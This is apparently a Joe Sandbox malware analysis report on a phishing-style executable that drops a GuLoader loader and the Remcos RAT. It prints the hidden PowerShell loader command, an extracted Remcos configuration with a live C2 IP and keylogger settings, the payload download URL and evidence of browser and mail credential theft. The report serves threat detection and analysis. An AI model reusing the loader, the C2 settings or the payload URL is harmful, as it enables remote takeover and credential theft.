Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
order CF08093-24.exe

Overview

General Information

Sample name:order CF08093-24.exe
Analysis ID:1572358
MD5:19c071ae3e499df299092283e301b7a2
SHA1:711e76279688465f62fd3de93ba05328393439cd
SHA256:edc42c5e0e81b4e0598f17cf43ad139e934e32e2538c97811e3b995fa139199f
Tags:exeRATRemcosRATuser-abuse_ch
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Initial sample is a PE file and has a suspicious name
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Powershell drops PE file
Queues an APC in another process (thread injection)
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Msiexec Initiated Connection
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • order CF08093-24.exe (PID: 7152 cmdline: "C:\Users\user\Desktop\order CF08093-24.exe" MD5: 19C071AE3E499DF299092283E301B7A2)
    • powershell.exe (PID: 4956 cmdline: powershell.exe -windowstyle hidden "$Amanuensissers25=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Lynlaases\Servicerende.Gal55';$Magnoliaceae=$Amanuensissers25.SubString(71792,3);.$Magnoliaceae($Amanuensissers25) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 5752 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 5496 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qzuooqprgulbovxttvfxbedksdnhf" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 1960 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qzuooqprgulbovxttvfxbedksdnhf" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 320 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qzuooqprgulbovxttvfxbedksdnhf" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 2072 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qzuooqprgulbovxttvfxbedksdnhf" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 6120 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\aczzpbalucdoyblxcfryerxbbswqyinsk" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 4396 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\dwmsp" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["212.162.149.91:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-HSAM04", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000006.00000003.3278532416.0000000007B2A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000006.00000002.4475133406.0000000007ABA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000006.00000003.3298978061.0000000007B39000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000006.00000003.3298626109.0000000007B37000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            00000006.00000002.4486408121.000000002340F000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
              Click to see the 8 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Suspicious Script Execution From Temp Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell.exe -windowstyle hidden "$Amanuensissers25=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Lynlaases\Servicerende.Gal55';$Magnoliaceae=$Amanuensissers25.SubString(71792,3);.$Magnoliaceae($Amanuensissers25), CommandLine: powershell.exe -windowstyle hidden "$Amanuensissers25=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Lynlaases\Servicerende.Gal55';$Magnoliaceae=$Amanuensissers25.SubString(71792,3);.$Magnoliaceae($Amanuensissers25), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\order CF08093-24.exe", ParentImage: C:\Users\user\Desktop\order CF08093-24.exe, ParentProcessId: 7152, ParentProcessName: order CF08093-24.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Amanuensissers25=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Lynlaases\Servicerende.Gal55';$Magnoliaceae=$Amanuensissers25.SubString(71792,3);.$Magnoliaceae($Amanuensissers25), ProcessId: 4956, ProcessName: powershell.exe
              Sigma detected: Msiexec Initiated Connection
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 212.162.149.89, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 5752, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49922
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Amanuensissers25=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Lynlaases\Servicerende.Gal55';$Magnoliaceae=$Amanuensissers25.SubString(71792,3);.$Magnoliaceae($Amanuensissers25), CommandLine: powershell.exe -windowstyle hidden "$Amanuensissers25=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Lynlaases\Servicerende.Gal55';$Magnoliaceae=$Amanuensissers25.SubString(71792,3);.$Magnoliaceae($Amanuensissers25), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\order CF08093-24.exe", ParentImage: C:\Users\user\Desktop\order CF08093-24.exe, ParentProcessId: 7152, ParentProcessName: order CF08093-24.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Amanuensissers25=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Lynlaases\Servicerende.Gal55';$Magnoliaceae=$Amanuensissers25.SubString(71792,3);.$Magnoliaceae($Amanuensissers25), ProcessId: 4956, ProcessName: powershell.exe

              Stealing of Sensitive Information

              barindex
              Sigma detected: Remcos
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 5752, TargetFilename: C:\ProgramData\remcos\logs.dat

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-10T13:52:59.770777+010020365941Malware Command and Control Activity Detected192.168.2.549933212.162.149.912404TCP
              2024-12-10T13:53:01.890405+010020365941Malware Command and Control Activity Detected192.168.2.549939212.162.149.912404TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-10T13:53:02.178716+010028033043Unknown Traffic192.168.2.549940178.237.33.5080TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-10T13:52:56.311136+010028032702Potentially Bad Traffic192.168.2.549922212.162.149.8980TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: http://212.162.149.89/xONeIbG151.binAvira URL Cloud: Label: malware
              Found malware configuration
              Source: 00000006.00000002.4475133406.0000000007AFD000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["212.162.149.91:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-HSAM04", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Lynlaases\Sikkerhedsuddannelsernes\order CF08093-24.exeReversingLabs: Detection: 13%
              Multi AV Scanner detection for submitted file
              Source: order CF08093-24.exeReversingLabs: Detection: 13%
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000006.00000003.3278532416.0000000007B2A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4475133406.0000000007ABA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000003.3298978061.0000000007B39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000003.3298626109.0000000007B37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4486408121.000000002340F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4475133406.0000000007AFD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4475133406.0000000007B39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4475133406.0000000007B15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000003.3275406324.0000000007B2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5752, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
              Machine Learning detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Lynlaases\Sikkerhedsuddannelsernes\order CF08093-24.exeJoe Sandbox ML: detected
              Machine Learning detection for sample
              Source: order CF08093-24.exeJoe Sandbox ML: detected
              Source: order CF08093-24.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: order CF08093-24.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: %]qm.Core.pdb source: powershell.exe, 00000002.00000002.3121960782.00000000083C8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: re.pdb source: powershell.exe, 00000002.00000002.3121960782.00000000083C8000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\order CF08093-24.exeCode function: 0_2_0040689E FindFirstFileW,FindClose,0_2_0040689E
              Source: C:\Users\user\Desktop\order CF08093-24.exeCode function: 0_2_00405C4D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C4D
              Source: C:\Users\user\Desktop\order CF08093-24.exeCode function: 0_2_00402930 FindFirstFileW,0_2_00402930
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_235F10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,6_2_235F10F1
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_235F6580 FindFirstFileExA,6_2_235F6580
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0040AE51 FindFirstFileW,FindNextFileW,10_2_0040AE51
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,11_2_00407EF8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,12_2_00407898

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49933 -> 212.162.149.91:2404
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49939 -> 212.162.149.91:2404
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorIPs: 212.162.149.91
              Source: global trafficTCP traffic: 192.168.2.5:49933 -> 212.162.149.91:2404
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
              Source: Joe Sandbox ViewASN Name: UNREAL-SERVERSUS UNREAL-SERVERSUS
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49922 -> 212.162.149.89:80
              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49940 -> 178.237.33.50:80
              Source: global trafficHTTP traffic detected: GET /xONeIbG151.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 212.162.149.89Cache-Control: no-cache
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: global trafficHTTP traffic detected: GET /xONeIbG151.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 212.162.149.89Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: msiexec.exe, 0000000A.00000002.3298254993.0000000002E6A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.3297488706.0000000002E6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: :///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
              Source: msiexec.exe, 0000000A.00000002.3298254993.0000000002E6A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.3297488706.0000000002E6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: :///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
              Source: msiexec.exe, 00000006.00000002.4486546941.00000000235C0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000C.00000002.3284176232.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: msiexec.exe, msiexec.exe, 0000000C.00000002.3284176232.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: msiexec.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: msiexec.exe, 00000006.00000002.4486764970.0000000023A40000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: msiexec.exe, 00000006.00000002.4486764970.0000000023A40000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: geoplugin.net
              Source: msiexec.exe, 00000006.00000002.4486072700.0000000022C70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.89/xONeIbG151.bin
              Source: msiexec.exe, 00000006.00000002.4475133406.0000000007ABA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.89/xONeIbG151.bin005
              Source: msiexec.exe, 00000006.00000002.4475133406.0000000007AFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.89/xONeIbG151.binA
              Source: msiexec.exe, 00000006.00000002.4475133406.0000000007AFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.89/xONeIbG151.bintA
              Source: bhvA9CA.tmp.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
              Source: bhvA9CA.tmp.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
              Source: powershell.exe, 00000002.00000002.3110396387.0000000002D08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
              Source: powershell.exe, 00000002.00000002.3115887918.00000000071C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro?U
              Source: powershell.exe, 00000002.00000002.3121960782.00000000083ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microzE
              Source: bhvA9CA.tmp.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhvA9CA.tmp.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
              Source: bhvA9CA.tmp.10.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
              Source: msiexec.exe, 00000006.00000002.4475133406.0000000007ABA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.4475133406.0000000007AFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: msiexec.exe, 00000006.00000002.4475133406.0000000007AFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp?l
              Source: msiexec.exe, 00000006.00000002.4475133406.0000000007AFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpIK
              Source: msiexec.exe, 00000006.00000002.4475133406.0000000007AFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpdK
              Source: msiexec.exe, 00000006.00000002.4475133406.0000000007AFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gphymK
              Source: order CF08093-24.exe, order CF08093-24.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: powershell.exe, 00000002.00000002.3114311818.0000000005B99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: bhvA9CA.tmp.10.drString found in binary or memory: http://ocsp.digicert.com0
              Source: powershell.exe, 00000002.00000002.3110901476.0000000004C86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.3110901476.0000000004C86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: powershell.exe, 00000002.00000002.3110901476.0000000004B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000002.00000002.3110901476.0000000004C86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
              Source: powershell.exe, 00000002.00000002.3110901476.0000000004C86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: msiexec.exe, msiexec.exe, 0000000C.00000002.3284176232.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
